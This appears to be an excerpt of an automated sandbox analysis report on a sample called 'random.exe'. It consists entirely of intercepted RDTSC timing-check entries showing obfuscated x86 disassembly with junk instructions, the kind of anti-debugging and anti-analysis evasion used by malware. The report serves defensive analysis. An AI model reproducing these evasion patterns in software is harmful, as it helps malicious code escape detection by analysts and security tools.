            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A10BBE second address: 4A10C30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6B8CF111A1h 0x00000009 xor si, 9A86h 0x0000000e jmp 00007F6B8CF111A1h 0x00000013 popfd 0x00000014 mov di, cx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, esi 0x0000001b jmp 00007F6B8CF1119Ah 0x00000020 mov esi, dword ptr [ebp+08h] 0x00000023 pushad 0x00000024 mov ecx, 6653E17Dh 0x00000029 mov ecx, 3DC21879h 0x0000002e popad 0x0000002f sub ebx, ebx 0x00000031 pushad 0x00000032 movsx edx, ax 0x00000035 mov dl, cl 0x00000037 popad 0x00000038 test esi, esi 0x0000003a jmp 00007F6B8CF1119Fh 0x0000003f je 00007F6BFF696900h 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A10C30 second address: 4A10C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A10C34 second address: 4A10C3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A10C3A second address: 4A10CFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 jmp 00007F6B8D266C40h 0x00000015 mov ecx, esi 0x00000017 jmp 00007F6B8D266C40h 0x0000001c je 00007F6BFF9EC368h 0x00000022 jmp 00007F6B8D266C40h 0x00000027 test byte ptr [77226968h], 00000002h 0x0000002e pushad 0x0000002f mov di, si 0x00000032 mov si, D689h 0x00000036 popad 0x00000037 jne 00007F6BFF9EC355h 0x0000003d jmp 00007F6B8D266C44h 0x00000042 mov edx, dword ptr [ebp+0Ch] 0x00000045 pushad 0x00000046 call 00007F6B8D266C3Eh 0x0000004b call 00007F6B8D266C42h 0x00000050 pop ecx 0x00000051 pop ebx 0x00000052 call 00007F6B8D266C40h 0x00000057 mov edi, eax 0x00000059 pop esi 0x0000005a popad 0x0000005b push esi 0x0000005c jmp 00007F6B8D266C3Ah 0x00000061 mov dword ptr [esp], ebx 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 popad 0x0000006a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A10CFF second address: 4A10D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A10D03 second address: 4A10D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A10D09 second address: 4A10D43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF111A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F6B8CF111A0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6B8CF1119Eh 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A10D99 second address: 4A10DE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F6B8D266C47h 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d jmp 00007F6B8D266C3Bh 0x00000012 pop ebx 0x00000013 jmp 00007F6B8D266C46h 0x00000018 mov esp, ebp 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A10DE1 second address: 4A10DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A1002E second address: 4A10081 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6B8D266C40h 0x00000008 pushfd 0x00000009 jmp 00007F6B8D266C42h 0x0000000e xor esi, 33790978h 0x00000014 jmp 00007F6B8D266C3Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F6B8D266C45h 0x00000025 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A10081 second address: 4A100B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF111A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov ax, 7A23h 0x00000010 movzx eax, bx 0x00000013 popad 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F6B8CF1119Dh 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A100B3 second address: 4A100C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A8084C second address: 4A80861 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B8CF111A1h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A80861 second address: 4A808C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F6B8D266C43h 0x00000015 sub esi, 4DCAD49Eh 0x0000001b jmp 00007F6B8D266C49h 0x00000020 popfd 0x00000021 jmp 00007F6B8D266C40h 0x00000026 popad 0x00000027 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A808C1 second address: 4A80934 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6B8CF111A1h 0x00000009 and esi, 4BC71586h 0x0000000f jmp 00007F6B8CF111A1h 0x00000014 popfd 0x00000015 movzx eax, dx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c pushad 0x0000001d mov ecx, 607AD62Fh 0x00000022 mov ebx, eax 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 pushad 0x00000027 mov di, si 0x0000002a call 00007F6B8CF111A8h 0x0000002f push esi 0x00000030 pop ebx 0x00000031 pop ecx 0x00000032 popad 0x00000033 mov ebp, esp 0x00000035 jmp 00007F6B8CF1119Dh 0x0000003a pop ebp 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e mov ah, DFh 0x00000040 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A70575 second address: 4A70579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A70579 second address: 4A7057F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A7057F second address: 4A705D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, F3h 0x0000000d jmp 00007F6B8D266C49h 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007F6B8D266C41h 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F6B8D266C3Dh 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A705D4 second address: 4A705E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B8CF1119Ch 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A705E4 second address: 4A705E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A705E8 second address: 4A705FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov di, 0FD0h 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop esi 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A1061D second address: 4A1062D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B8D266C3Ch 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A1062D second address: 4A10685 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF1119Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d call 00007F6B8CF111A4h 0x00000012 pushad 0x00000013 popad 0x00000014 pop esi 0x00000015 push edi 0x00000016 mov ecx, 3EDC4D63h 0x0000001b pop ecx 0x0000001c popad 0x0000001d push eax 0x0000001e jmp 00007F6B8CF111A6h 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F6B8CF1119Ah 0x0000002d rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A10685 second address: 4A10694 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A709C2 second address: 4A709C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A709C8 second address: 4A709CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A709CC second address: 4A70A1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF1119Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+0Ch] 0x0000000e jmp 00007F6B8CF111A6h 0x00000013 push dword ptr [ebp+08h] 0x00000016 jmp 00007F6B8CF111A0h 0x0000001b push E0555F87h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F6B8CF1119Ch 0x00000027 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 855A98 second address: 855AE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F6B8D266C47h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F6B8D266C48h 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 855AE6 second address: 855AEC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A5001D second address: 4A5006B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F6B8D266C3Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F6B8D266C3Ch 0x00000019 and esi, 117F22F8h 0x0000001f jmp 00007F6B8D266C3Bh 0x00000024 popfd 0x00000025 push ecx 0x00000026 pop edx 0x00000027 popad 0x00000028 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A5006B second address: 4A5009E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, bh 0x00000005 call 00007F6B8CF1119Ch 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov si, di 0x00000013 mov di, DB6Eh 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F6B8CF111A0h 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A5009E second address: 4A500DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF0h 0x0000000c pushad 0x0000000d push eax 0x0000000e jmp 00007F6B8D266C3Bh 0x00000013 pop ecx 0x00000014 movsx edi, si 0x00000017 popad 0x00000018 sub esp, 44h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F6B8D266C47h 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A500DE second address: 4A500E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A500E3 second address: 4A501EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F6B8D266C45h 0x0000000a xor ecx, 39CDC666h 0x00000010 jmp 00007F6B8D266C41h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebx 0x0000001a jmp 00007F6B8D266C3Eh 0x0000001f push eax 0x00000020 pushad 0x00000021 mov ax, bx 0x00000024 pushfd 0x00000025 jmp 00007F6B8D266C3Dh 0x0000002a xor ecx, 6A5A5676h 0x00000030 jmp 00007F6B8D266C41h 0x00000035 popfd 0x00000036 popad 0x00000037 xchg eax, ebx 0x00000038 pushad 0x00000039 mov ax, B503h 0x0000003d pushfd 0x0000003e jmp 00007F6B8D266C48h 0x00000043 add ax, 8AC8h 0x00000048 jmp 00007F6B8D266C3Bh 0x0000004d popfd 0x0000004e popad 0x0000004f xchg eax, esi 0x00000050 jmp 00007F6B8D266C46h 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 pushfd 0x0000005a jmp 00007F6B8D266C3Ch 0x0000005f sub eax, 3E331058h 0x00000065 jmp 00007F6B8D266C3Bh 0x0000006a popfd 0x0000006b pushfd 0x0000006c jmp 00007F6B8D266C48h 0x00000071 and ecx, 70FD9AB8h 0x00000077 jmp 00007F6B8D266C3Bh 0x0000007c popfd 0x0000007d popad 0x0000007e rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A501EA second address: 4A501F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A501F0 second address: 4A50234 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d mov dl, ch 0x0000000f pushfd 0x00000010 jmp 00007F6B8D266C41h 0x00000015 sbb cl, 00000006h 0x00000018 jmp 00007F6B8D266C41h 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, edi 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A50234 second address: 4A50238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A50238 second address: 4A5023E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A5023E second address: 4A50253 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, ECA7h 0x00000007 mov si, AC43h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A50253 second address: 4A50257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A50257 second address: 4A5025B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A5025B second address: 4A50261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A50261 second address: 4A5028F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF1119Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6B8CF111A8h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A5028F second address: 4A50293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A50293 second address: 4A50299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A50299 second address: 4A5029F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A5029F second address: 4A50393 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF111A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, dword ptr [ebp+08h] 0x0000000e jmp 00007F6B8CF111A0h 0x00000013 mov dword ptr [esp+24h], 00000000h 0x0000001b pushad 0x0000001c call 00007F6B8CF1119Eh 0x00000021 mov ah, D1h 0x00000023 pop edx 0x00000024 jmp 00007F6B8CF1119Ch 0x00000029 popad 0x0000002a lock bts dword ptr [edi], 00000000h 0x0000002f pushad 0x00000030 push eax 0x00000031 pushfd 0x00000032 jmp 00007F6B8CF1119Dh 0x00000037 xor si, 0046h 0x0000003c jmp 00007F6B8CF111A1h 0x00000041 popfd 0x00000042 pop ecx 0x00000043 mov ax, bx 0x00000046 popad 0x00000047 jc 00007F6BFF6032A1h 0x0000004d pushad 0x0000004e pushfd 0x0000004f jmp 00007F6B8CF111A9h 0x00000054 xor esi, 66AC3856h 0x0000005a jmp 00007F6B8CF111A1h 0x0000005f popfd 0x00000060 pushfd 0x00000061 jmp 00007F6B8CF111A0h 0x00000066 jmp 00007F6B8CF111A5h 0x0000006b popfd 0x0000006c popad 0x0000006d pop edi 0x0000006e push eax 0x0000006f push edx 0x00000070 pushad 0x00000071 movsx edx, cx 0x00000074 push esi 0x00000075 pop edi 0x00000076 popad 0x00000077 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A50393 second address: 4A50408 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6B8D266C47h 0x00000009 sub si, 879Eh 0x0000000e jmp 00007F6B8D266C49h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F6B8D266C40h 0x0000001a sbb cl, FFFFFF98h 0x0000001d jmp 00007F6B8D266C3Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 pop esi 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F6B8D266C45h 0x0000002e rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A50408 second address: 4A50429 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 4DA6D8C2h 0x00000008 mov cx, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6B8CF111A0h 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A40A2F second address: 4A40A57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6B8D266C47h 0x00000008 mov cx, E6EFh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A40A57 second address: 4A40A67 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 7318C883h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a mov cx, A8F5h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A40A67 second address: 4A40A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6B8D266C3Dh 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A40A7D second address: 4A40AF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF111A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F6B8CF111A1h 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 mov dx, si 0x00000014 pushfd 0x00000015 jmp 00007F6B8CF111A8h 0x0000001a and ax, 9D08h 0x0000001f jmp 00007F6B8CF1119Bh 0x00000024 popfd 0x00000025 popad 0x00000026 xchg eax, esi 0x00000027 pushad 0x00000028 mov ecx, 5767DC9Bh 0x0000002d jmp 00007F6B8CF111A0h 0x00000032 popad 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A40AF3 second address: 4A40AF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A40AF9 second address: 4A40B2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F6B8CF1119Dh 0x00000011 mov esi, dword ptr [ebp+08h] 0x00000014 jmp 00007F6B8CF1119Eh 0x00000019 sub ecx, ecx 0x0000001b pushad 0x0000001c mov dl, 71h 0x0000001e push eax 0x0000001f push edx 0x00000020 mov si, 81C5h 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A40B2E second address: 4A40B63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, edi 0x00000008 jmp 00007F6B8D266C3Eh 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 pop edx 0x00000013 jmp 00007F6B8D266C48h 0x00000018 popad 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A40B63 second address: 4A40BB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ecx, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, edi 0x0000000b pushad 0x0000000c mov dl, CDh 0x0000000e pushad 0x0000000f mov ax, 163Dh 0x00000013 pushfd 0x00000014 jmp 00007F6B8CF1119Ah 0x00000019 add esi, 4FBD1C18h 0x0000001f jmp 00007F6B8CF1119Bh 0x00000024 popfd 0x00000025 popad 0x00000026 popad 0x00000027 mov eax, 00000001h 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F6B8CF111A5h 0x00000033 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A40BB1 second address: 4A40BC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B8D266C3Ch 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A40BC1 second address: 4A40BD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lock cmpxchg dword ptr [esi], ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6B8CF1119Ah 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A40BD9 second address: 4A40C3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6B8D266C41h 0x00000009 jmp 00007F6B8D266C3Bh 0x0000000e popfd 0x0000000f push eax 0x00000010 pop ebx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov ecx, eax 0x00000016 pushad 0x00000017 movzx ecx, di 0x0000001a pushfd 0x0000001b jmp 00007F6B8D266C3Dh 0x00000020 or ax, 3326h 0x00000025 jmp 00007F6B8D266C41h 0x0000002a popfd 0x0000002b popad 0x0000002c cmp ecx, 01h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F6B8D266C3Dh 0x00000036 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A40C3D second address: 4A40C74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF111A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F6BFF612B12h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6B8CF111A8h 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A40C74 second address: 4A40C7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A40C7A second address: 4A40CE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF1119Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F6B8CF1119Eh 0x00000011 sbb eax, 344774B8h 0x00000017 jmp 00007F6B8CF1119Bh 0x0000001c popfd 0x0000001d mov bl, al 0x0000001f popad 0x00000020 pop esi 0x00000021 pushad 0x00000022 jmp 00007F6B8CF111A1h 0x00000027 mov cx, 93D7h 0x0000002b popad 0x0000002c pop ebx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 jmp 00007F6B8CF1119Fh 0x00000035 mov ah, 61h 0x00000037 popad 0x00000038 rdtsc
